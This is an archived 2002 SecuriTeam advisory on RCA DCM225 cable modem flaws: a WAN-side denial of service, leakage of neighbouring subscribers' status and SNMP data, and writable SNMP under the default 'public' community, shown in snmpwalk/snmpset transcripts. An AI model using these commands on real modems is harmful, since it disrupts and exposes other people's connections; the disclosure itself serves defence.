[NEWS] RCA Cable Modem Contains Multiple Vulnerabilities

From: support@securiteam.com
Date: 03/28/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 28 Mar 2002 13:07:30 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  RCA Cable Modem Contains Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The RCA Digital Cable Modem serves as a two-way high-speed bridge between
your personal computer and a cable Internet Service Provider (ISP). It
converts information that originates from the Internet or your computer
into electronic messages that can be transported over the same wires your
cable company uses to transport video signals. Multiple security
vulnerabilities have been found in the product that range from causing a
denial of service attack against it, to sensitive information leakage.

DETAILS

Denial of Service:
The RCA cable modem has two devices, one for the local location
(192.168.100.1). The other (10.x.x.x) device is used in the remote
location. If you connect to the second device (10.x.x.x) on the listening
port 80 (TCP), the RCA cable modem will reset the user connection the user
has with the Internet.

Information Leakage:
It is possible to connect to any modem residing on the WAN (inside the IP
range of 10.x.x.x, are all modems that are located at the same node), and
look at the user's cable modem status information. The information
contained there will reveal things such as:

        USB: Inactive
        Ethernet: 100
        BaseT
        MAC Address: 00 10 95 0a 05 62
        User: Active
        Signal Acquired at 573 MHz
        SNR: 36.0 dB
        Received Signal Strength: -4.0 dBmV
        Micro-Reflections: 20 dBc
        Connection: Acquired
        Frequency: 37 MHz
        Power Level: 44.0 dBmV
        Channel ID: 4
        Number of user conected: 1

Or further information can be gathered by dumping user's cable modem SNMP
data:

69.1.4.2.0 = IpAddress: 10.20.250.1
69.1.4.3.0 = IpAddress: 10.20.250.1
69.1.4.4.0 = IpAddress: 10.20.250.1
69.1.4.5.0 = "docsis_light_avalos"

Where the word "avalos" is the name of the street where the node facility
is located.

Mis-configuration allows configuration of the device:
By accessing the device via SNMP using the commonly known communities
(public/public), it is possible to both read and write information stored
on the device.

[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS:
PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 79

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
system.sysName.0 = lame

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s
lame_cyty
system.sysName.0 = lame_city

[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS:
PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
system.sysServices.0 = 79

ADDITIONAL INFORMATION

The information has been provided by <mailto:gmaggiot@ciudad.com.ar>
Gabriel A. Maggiotti.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • RE: Cable Vs. DSL
    ... "tunneled" by PPPoE after cable modem boot and POST. ... security *product* when combined with good anti-virus software because ... Training features 6 hand-on courses on May 12-13 taught by ...
    (Security-Basics)
  • Re: DHCP or Probe?
    ... Roadrunner assigns your cable modem a 10 dot address even though your host ... This is more than likely your cable modem renewing its IP ... > Security Linux, the comprehensive security solution that combines six ...
    (Incidents)
  • Re: DHCP or Probe?
    ... I'm getting the following traffic about every second to my cable modem (My ... firewall with virus/spam protection, URL filtering, VPN, ... Security Linux, the comprehensive security solution that combines six ...
    (Incidents)
  • Re: ie 6 sp2 problem
    ... Check for a HOSTS file. ... If running a cable modem, dsl modem or router, have you, at some point, shut ... Check any third-party security programs to see if one of them is blocking ... Norton Internet Security can cause problems with SP2. ...
    (microsoft.public.windows.inetexplorer.ie6.browser)
  • Re: [Full-disclosure] LSNN: Aditya releases lame documents; FD vulnerable
    ... security conferences but looks like some of them are even bigger ... people like Aditya and n3td3v will be speakers at such conferences and ... The lame ass of the month, Aditya K Sood has released two documents of ... A VULNERABILITY FOUND IN FULL DISCLOSURE MAILING LIST ...
    (Full-Disclosure)